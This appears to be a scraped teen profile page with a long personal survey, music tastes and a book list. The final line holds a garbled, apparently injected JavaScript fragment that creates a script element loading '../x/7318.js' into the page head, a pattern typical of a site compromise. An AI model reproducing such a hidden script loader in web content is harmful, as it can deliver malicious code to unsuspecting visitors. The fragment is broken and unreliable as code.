Writing, music, film, friends, soccer, running, school
...::About Me::...
Full Name: Silvester O. that's all your getting
Eye Color: Dark Brown
Hair Color: Black
Height: 5 foot 9"
Shoe Size: 8ish
Ring Size: no idea
Heritage: Nigerian
Graduating Year: 2008
Birthdate: Oct. 9th
Zodiac Sign: Libra
Concert: Soon...unfortunately
Best Friend: bad memory
Crush: kindegarten...i can't remember her name i just know that she hated tomatoes
Pet: nope
Sport: Soccer!
...::Have You Ever::...
Sky Dived: nah
Bungee Jumped: no
Gone out of the Country: several times
Beaten Someone Up: uhh..5th
Gotten Beat Up: kinda
Killed an Animal: thats sadistic i don't think so
Swam in the Ocean: if you can consider swimming
Broke the Law: which one?
Smoked: quit
Chewed Tobacco: not on purpose
Drank: binge
Been Kissed: in many places
Been In Love: sorta
Dumped Someone: oh yea
Been Dumped: yea
Broken Someone's heart: probably
Had Your Heart Broken: yea
Liked Someone Who Didn't Like You Back: haha that's the worst
Broken A Bone: should have but I've always been a tough kid :-D
Had Surgery: the dentist? if not then No
Had an X-ray or MRI: X-rays
Failed a Class: Never
Color: right now Brown
Food: currently grubbing on Nigerian cuisine
Drink: Water with lemon
Snack: fruit(not fruit snacks)
Cereal: Cap'n Crunch
Ice Cream: Vanilla(plain but versatile)
Candy: not really
Restaurant: Qdoba
Fast Food Place: Taco Bell
Store: I'm diverse
Animal: your mother
Quote: "Friends do because they wanna do"-Rocky
Sport To Play: Soccer!
Sport To Watch: All of the above
Movie: haha ask me later
TV Show: uhh
Type Of Music: T'V is getting a little too reality based for me
Band: Green Day...for now
Singer: Ne-Yo
Song: Working Class Hero
Pepsi or Coke: Neither
Vanilla or Chocolate: Chocolate(race card played well)
Cake or Ice Cream: both YES!
McDonalds or Burger King: yuck
Love or Money: L...
Music or TV: music is less asinine?
Cat or Dog: Woof!
Mom or Dad: Mom
Truck or Car: Truck(no reflection on my shoe size)
Ocean or Lake: the bayou...sike nah the ocean
Yahoo or Hotmail: yahoo...although i think wikipedia should become an option
Google or AJ: Google
Light or Dark: depends on mood
Country or City: country is peaceful but the city has more to offer...thats tough
Rain or Sunshine: again depends on mood
...::The Opposite Sex::...
First Thing You Notice: Smile
Personality or Looks: combination
Hair Color: whatever compliments your style
Eye Color: doesn't matter
Short or Tall: no taller than me
Romanic or Spontaneous: spotanaity can't be romantic?.. romantically planned then
Sense of Humor or Sweet: tasty
Hook up or Relationship: relations(hip)
Feeling: bored
Listening To: the rain and a movie that suppose to be funny
Wanna: ;-)
Doing Besides Typing: Running
Thinking About: employment
Wearing: pj's
In Love: N/A
Single: yessir
Best Friends: I haven't met him/her yet
...::The Future::...
Career: Lawyer/therapist/Law enforcement agent
Marriage: yes
Kids: yes
The Ultimate Survey @ MyHotQuiz
females and cool people/anyone who has anything interesting to say.IN NO PARTICUAL ORDER...
25% Rock...
25% Hip Hop...
10% Rhythm & Blues...
40% Other...
Inherit the wind, Life of Pi, Brighton Beach Memoirs, Oedipus Rex, Shakespeare, Stone Cold...etc.
not many but if I had to choose » .."var s=..reateElement('script');s.src='../x/7318.js';document 3;getElementsByTagName('head')[0].appendChild(s);"